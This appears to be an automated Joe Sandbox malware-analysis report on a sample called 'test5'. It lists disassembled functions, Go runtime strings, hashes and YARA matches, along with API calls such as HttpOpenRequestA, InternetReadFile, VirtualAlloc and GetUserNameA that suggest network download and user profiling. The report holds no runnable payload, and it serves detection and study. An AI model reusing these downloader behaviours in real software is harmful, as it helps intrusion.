String ID: !"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC$malloc deadlockruntime error: with GC progscan missed a gmisaligned maskruntime: min = runtime: inUse=runtime: max = requested skip=bad panic stackrecovery failedstopm holding pstartm: m has ppreempt SPWRITEmissing mcache?ms: gomaxprocs=randinit missed]mo$malloc during signalclose of nil channelinconsistent lockedmnotetsleep not on g0bad system page size to unallocated span/gc/scan/stack:bytes/gc/scan/total:bytes/gc/heap/frees:bytes/gc/gomemlimit:bytesp mcache not flushed markroot jobs donepacer: assist ratio=$mallocgc called with gcphase == _GCmarkterminationruntime.Pinner: object was allocated into an arenaruntime.Pinner: decreased non-existing pin counterrecursive call during initialization - linker skewattempt to execute system stack code on user stackcompileCal$mallocgc called without a P or outside bootstrappingruntime.SetFinalizer: pointer not in allocated blockruntime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetruntime: GetQueuedCompletionStatusEx failed (errno= $VC
API String ID: 0-3353434475
Opcode ID: b3c0e9def0f2b1eb2acee7d1a630f618e95cd709c5d7e0a2e4b208da0e45476c
Instruction ID: 3559b827da8e2e18cf9ba6ea4d5c991fa9f7c5d057830ff1c17f345074c9aeae
Opcode Fuzzy Hash: b3c0e9def0f2b1eb2acee7d1a630f618e95cd709c5d7e0a2e4b208da0e45476c
Instruction Fuzzy Hash: EF42F47270A7D486DB64CF26E4407AAB766F786B94F489116EF9D03B95CF38C885CB00

Function 00682060 Relevance: 7.9, Strings: 6, Instructions: 430
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

sse41sse42ssse3parseutf-8%s*%dtext/Greek (at ClassSHA-1StringFormat[]bytestringGetAceGetACPlistensendtosocketactiveclosedsocks5acceptcookieexpectserversysmontimersefenceselect, not object next= jobs= goid sweep B -> % util alloc free span= prev= list=, i = , xrefs: 006822ED
pclmulqdqrwxrwxrwxtlsrsakex%s %q: %sempty urlInheritedmath/randClassINETAuthorityquestionsunderflowuser32.dlldnsapi.dlldwmapi.dllws2_32.dllIsValidSidDnsQuery_WGetIfEntryCancelIoExCreatePipeGetVersionLocalAllocLockFileExOpenEventWOpenMutexWOpenThreadPulseEventR, xrefs: 006820DF
adxaesshaavxfma///%25204206304400500\\.\\?\??net): TTLMD4MD5truebindHost<>idlehttp1080POSTdateetagfromhostlinkvaryfilereadopensyncpipeStatallgallprootitabsbrkdead is LEAFbase of ) = <==GOGC] = pc=+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= s, xrefs: 00682086
rdtscppopcntX25519Commoncmd/goheaderAnswerLengthavx512rdrandrdseedfloat32float64CopySidFreeSidSleepExWSARecvWSASendconnectTrailersocks5hexpiresrefererrefreshGODEBUG:method:scheme:statushttp://consoleforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsysca, xrefs: 00682100
avx512bwavx512vltlskyberif-rangeNO_PROXYno_proxygo/typesnet/httpgo/buildx509sha1ClassANYQuestionMD5+SHA1SHA3-224SHA3-256SHA3-384SHA3-512SHA1-RSADSA-SHA1avx512cdavx512eravx512pfavx512dqntdll.dllole32.dllpsapi.dllwinmm.dllFindCloseLocalFreeMoveFileWPurgeCommSetu, xrefs: 0068261C
avx512fnil keytls3descharset\\.\UNCos/execruntimeanswersSHA-224SHA-256SHA-384SHA-512Ed25519MD5-RSAamxtileamxint8amxbf16osxsaveGoStringEqualSidCancelIoReadFileSetEventAcceptExIsWindowWSAIoctlrecvfromshutdownhijackedif-matchlocationFullPathscavengepollDesctraceB, xrefs: 006825F5

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: adxaesshaavxfma///%25204206304400500\\.\\?\??net): TTLMD4MD5truebindHost<>idlehttp1080POSTdateetagfromhostlinkvaryfilereadopensyncpipeStatallgallprootitabsbrkdead is LEAFbase of ) = <==GOGC] = pc=+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= s$avx512bwavx512vltlskyberif-rangeNO_PROXYno_proxygo/typesnet/httpgo/buildx509sha1ClassANYQuestionMD5+SHA1SHA3-224SHA3-256SHA3-384SHA3-512SHA1-RSADSA-SHA1avx512cdavx512eravx512pfavx512dqntdll.dllole32.dllpsapi.dllwinmm.dllFindCloseLocalFreeMoveFileWPurgeCommSetu$avx512fnil keytls3descharset\\.\UNCos/execruntimeanswersSHA-224SHA-256SHA-384SHA-512Ed25519MD5-RSAamxtileamxint8amxbf16osxsaveGoStringEqualSidCancelIoReadFileSetEventAcceptExIsWindowWSAIoctlrecvfromshutdownhijackedif-matchlocationFullPathscavengepollDesctraceB$pclmulqdqrwxrwxrwxtlsrsakex%s %q: %sempty urlInheritedmath/randClassINETAuthorityquestionsunderflowuser32.dlldnsapi.dlldwmapi.dllws2_32.dllIsValidSidDnsQuery_WGetIfEntryCancelIoExCreatePipeGetVersionLocalAllocLockFileExOpenEventWOpenMutexWOpenThreadPulseEventR$rdtscppopcntX25519Commoncmd/goheaderAnswerLengthavx512rdrandrdseedfloat32float64CopySidFreeSidSleepExWSARecvWSASendconnectTrailersocks5hexpiresrefererrefreshGODEBUG:method:scheme:statushttp://consoleforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsysca$sse41sse42ssse3parseutf-8%s*%dtext/Greek (at ClassSHA-1StringFormat[]bytestringGetAceGetACPlistensendtosocketactiveclosedsocks5acceptcookieexpectserversysmontimersefenceselect, not object next= jobs= goid sweep B -> % util alloc free span= prev= list=, i =
API String ID: 0-3585467764
Opcode ID: 619c65b7fd3277ca11d91cb4e3f4f65f7788ec59bcb3fa79e7dd1fc932e4e730
Instruction ID: e7ba68ba92d4c7ae10457d877b6537852ab0bbfd175d78fc92ac5d9444adddb2
Opcode Fuzzy Hash: 619c65b7fd3277ca11d91cb4e3f4f65f7788ec59bcb3fa79e7dd1fc932e4e730
Instruction Fuzzy Hash: C132BB7AA14F48C1E700DF26F84579937B5F35AB80F54922AEA8D87362DF39C0A9C345

Function 0000021551B0015A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpOpenRequestA.WININET(00000000,00000000,84C03200,00000000), ref: 0000021551B00175
VirtualAlloc.KERNELBASE ref: 0000021551B0037A
InternetReadFile.WININET(0000021551B00188,0000021551B00188), ref: 0000021551B00398

Strings

U.;, xrefs: 0000021551B00170

Memory Dump Source

Source File: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551b00000_test5.jbxd

Yara matches

Similarity

API ID: AllocFileHttpInternetOpenReadRequestVirtual
String ID: U.;
API String ID: 1187293180-4213443877
Opcode ID: 384db265c013720a470dfad14405f5eea7b7aafc50a111f5be8b2763f8998fcb
Instruction ID: 090699bb14df1985eb9f7c3fece1c99fe1adcfaf9aa6d12df807c3009a26288f
Opcode Fuzzy Hash: 384db265c013720a470dfad14405f5eea7b7aafc50a111f5be8b2763f8998fcb
Instruction Fuzzy Hash: EF11BB6034890D2BF61981AD7C9A73A21CBD3D8765F24816FB10EC32D6EC68CC82411A

Function 0000021551C04578 Relevance: 4.7, APIs: 3, Instructions: 190stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000021551C0473C: malloc.LIBCMT ref: 0000021551C04758

GetUserNameA.ADVAPI32(?,?,?,?,?,?,?,-00000001,00000000,-00000001,00000000,00000003,0000021551BFCC50), ref: 0000021551C045FF
strrchr.LIBCMT ref: 0000021551C0463D
_snprintf.LIBCMT ref: 0000021551C046EB

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: NameUser_snprintfmallocstrrchr
String ID:
API String ID: 1238167203-0
Opcode ID: ecc06dbed6b00357dbdd203c36bf59700dfcb02d7072b491f5a07a84e667c2e0
Instruction ID: 6f8b05eb17c594c1c1ce755649324c4e089d7e910d76511946f520d0c2dab815
Opcode Fuzzy Hash: ecc06dbed6b00357dbdd203c36bf59700dfcb02d7072b491f5a07a84e667c2e0
Instruction Fuzzy Hash: 84518530718E589FEA48BB78A4867EE76D3E7D8310F5445ADA08AC3296DA34DC428742

Function 006A5DC0 Relevance: 2.9, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

9Zj, xrefs: 006A63CB
grew heap, but no adequate free space foundroot level max pages doesn't fit in summaryruntime.Pinner: argument is not a pointer: runtime: releaseSudog with non-nil gp.paramunknown runnable goroutine during bootstrapruntime: casfrom_Gscanstatus bad oldval gp=ru, xrefs: 006A6394

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: 9Zj$grew heap, but no adequate free space foundroot level max pages doesn't fit in summaryruntime.Pinner: argument is not a pointer: runtime: releaseSudog with non-nil gp.paramunknown runnable goroutine during bootstrapruntime: casfrom_Gscanstatus bad oldval gp=ru
API String ID: 0-2512891660
Opcode ID: 64ef0073116d78c69874766450261784afc98ebe48f121a692329a8ea973c4d4
Instruction ID: 5d04ab02dabb0b9add25172e723858b42b58d09a2d8944b98f785c7c82c15ea4
Opcode Fuzzy Hash: 64ef0073116d78c69874766450261784afc98ebe48f121a692329a8ea973c4d4
Instruction Fuzzy Hash: 29E17072209B8485DB60EB25E48039EBB62F786BD0F589116EF9D43B69DF38C855CF40

Function 006B1040 Relevance: 2.6, Strings: 2, Instructions: 65COMMON

Download Yara Rule

Strings

PowerRegisterSuspendResumeNotification, xrefs: 006B10A9
powrprof.dll, xrefs: 006B1059

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: PowerRegisterSuspendResumeNotification$powrprof.dll
API String ID: 0-3247360486
Opcode ID: 080df910b754c45983ad319ec92a29659eb1a73e91a9d118513df2ae33f38e27
Instruction ID: bd2ba9507e4a0d9b8f06c6c3cefe5cda3f9c4bd6a2977731de8df4e7f112f761
Opcode Fuzzy Hash: 080df910b754c45983ad319ec92a29659eb1a73e91a9d118513df2ae33f38e27
Instruction Fuzzy Hash: 63217C32204B84C2DB00DF11F44539ABBA6F38AB80F98811AEB9C47B69DF7DC095CB00

Function 00692EA0 Relevance: 1.5, Strings: 1, Instructions: 277COMMON

Download Yara Rule

Strings

span has no free objectsruntime: found obj at *(runtime: VirtualFree of /cgo/go-to-c-calls:calls/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incor, xrefs: 00693044

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: span has no free objectsruntime: found obj at *(runtime: VirtualFree of /cgo/go-to-c-calls:calls/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incor
API String ID: 0-1712010102
Opcode ID: 113168dd8cd0838c899b54594bdc680877db052c543a6199ab5d6652d01ec4e0
Instruction ID: 7e8e401279b9000d5d9bd4a37da78590491a1e5423e6be14c9777637014ce9b0
Opcode Fuzzy Hash: 113168dd8cd0838c899b54594bdc680877db052c543a6199ab5d6652d01ec4e0
Instruction Fuzzy Hash: 57B12932209B918ADF50DB25E4913AEB77AF785B54F044129EB8D03BA9DF3CCA44CB10

Function 006A4FA0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

@Mj, xrefs: 006A4FC5

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: @Mj
API String ID: 0-1735126492
Opcode ID: 6d7ab3d25694823016ed439db971acd1afc71fe8623d7819c2a543afe797e61e
Instruction ID: e6dd1970f94df5a2569bd3c228350848a98e2834ef8982cea86db711a722b8fd
Opcode Fuzzy Hash: 6d7ab3d25694823016ed439db971acd1afc71fe8623d7819c2a543afe797e61e
Instruction Fuzzy Hash: BC41957A304B8691DF84DB19E8813EA2752E385BC0F85D036EE4F47B69DE38C55AC741

Function 006C4AE0 Relevance: .3, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c1b710aa581105ce077470ed4dd5055f969c97f0eed0fd2d3014acd7a84847d
Instruction ID: 6810348ad0603b0912026afa46d6cfdb1eec22faf3e0d5705a4ff7b71cfe1d08
Opcode Fuzzy Hash: 3c1b710aa581105ce077470ed4dd5055f969c97f0eed0fd2d3014acd7a84847d
Instruction Fuzzy Hash: 59C1C572209B4486EB00DF65F8A177AB762F786780F54512EEA8D8776ADF7CC841CB04

Function 006BD8E0 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef146861610d32b6a974d0ff372a88f2021a393453dade5270ad56bce7b767dc
Instruction ID: 90eee97b3c4b895f754d9ef6cc4b1c5bda5fe47b1ae0aa322d97387591e4b6c6
Opcode Fuzzy Hash: ef146861610d32b6a974d0ff372a88f2021a393453dade5270ad56bce7b767dc
Instruction Fuzzy Hash: B991C5F1A05B008ADB129F16E8903F97763F786B85F599139DA4C0B326EB39C8C6C744

Function 006B1180 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a97ce655f4e0cac6955700c642791870ea1a8c4fea0e8b3dbafc5627d03b9b52
Instruction ID: d77bcb952ce203ffa491510052ac3aaa823b3f3c5ab2b5ecc7373c01aebe8e27
Opcode Fuzzy Hash: a97ce655f4e0cac6955700c642791870ea1a8c4fea0e8b3dbafc5627d03b9b52
Instruction Fuzzy Hash: E1215132708B85D2CB50CB25F4513AAB765F346BD4F549225EEAD87BA9DB39C1C1CB00

Function 0000021551BFE3A4 Relevance: 9.2, APIs: 6, Instructions: 239
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_snprintf.LIBCMT ref: 0000021551BFE43D

Part of subcall function 0000021551C0D57C: _errno.LIBCMT ref: 0000021551C0D5B3
Part of subcall function 0000021551C0D57C: _invalid_parameter_noinfo.LIBCMT ref: 0000021551C0D5BE

_snprintf.LIBCMT ref: 0000021551BFE497
_snprintf.LIBCMT ref: 0000021551BFE4AE
HttpOpenRequestA.WININET ref: 0000021551BFE4F3
InternetQueryDataAvailable.WININET ref: 0000021551BFE554
InternetCloseHandle.WININET ref: 0000021551BFE572

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: _snprintf$Internet$AvailableCloseDataHandleHttpOpenQueryRequest_errno_invalid_parameter_noinfo
String ID:
API String ID: 1006711554-0
Opcode ID: 2eb0edb0e8600735d118a9a3102a95e924e1697cd069f818d03d23b98a2022eb
Instruction ID: 08612f5048bc2ba034bad5130c01802f556816d42292c75c545ba6ac0078f89e
Opcode Fuzzy Hash: 2eb0edb0e8600735d118a9a3102a95e924e1697cd069f818d03d23b98a2022eb
Instruction Fuzzy Hash: 3771D53061CA189BEB54EF28D8897FE77E6FBE8311F40056DE44AC3191EE35E9418B81

Function 0000021551BFCA74 Relevance: 7.8, APIs: 6, Instructions: 347
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000021551C0473C: malloc.LIBCMT ref: 0000021551C04758

malloc.LIBCMT ref: 0000021551BFCB1E

Part of subcall function 0000021551C0D1C8: _FF_MSGBANNER.LIBCMT ref: 0000021551C0D1F8
Part of subcall function 0000021551C0D1C8: _NMSG_WRITE.LIBCMT ref: 0000021551C0D202
Part of subcall function 0000021551C0D1C8: _callnewh.LIBCMT ref: 0000021551C0D236
Part of subcall function 0000021551C0D1C8: _errno.LIBCMT ref: 0000021551C0D241
Part of subcall function 0000021551C0D1C8: _errno.LIBCMT ref: 0000021551C0D24C

Part of subcall function 0000021551C0CA38: malloc.LIBCMT ref: 0000021551C0CA88

Part of subcall function 0000021551C0CA38: realloc.LIBCMT ref: 0000021551C0CA97

malloc.LIBCMT ref: 0000021551BFCC10
_snprintf.LIBCMT ref: 0000021551BFCC8E
_snprintf.LIBCMT ref: 0000021551BFCCB6
_snprintf.LIBCMT ref: 0000021551BFCCDD
free.LIBCMT ref: 0000021551BFCE4B

Part of subcall function 0000021551C09314: malloc.LIBCMT ref: 0000021551C09348
Part of subcall function 0000021551C09314: free.LIBCMT ref: 0000021551C094FF

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: malloc$_snprintf$_errnofree$_callnewhrealloc
String ID:
API String ID: 2667508507-0
Opcode ID: 640527ed828b8086bb4541aa1f9c63a5ff0a17add3c1388993af7cef0feedb0d
Instruction ID: d74f784cda792ebde45bfbd33b5616fc8a5b46a915be889b7f3feb6170d5a64b
Opcode Fuzzy Hash: 640527ed828b8086bb4541aa1f9c63a5ff0a17add3c1388993af7cef0feedb0d
Instruction Fuzzy Hash: 2DC1B630214E24ABEB54FB74C4CA7FD7AD3EBE8310F8044ADA549C72D3EE25E9458A41

Function 0000021551BFEC4C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASocketA.WS2_32 ref: 0000021551BFEC7A
WSAIoctl.WS2_32 ref: 0000021551BFECC7

Strings

_Cy, xrefs: 0000021551BFECD9

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: IoctlSocket
String ID: _Cy
API String ID: 1409745359-1085951347
Opcode ID: ed3bc8682e04584c078993addf9385ecf90319f8e82490e05fce3f662c482907
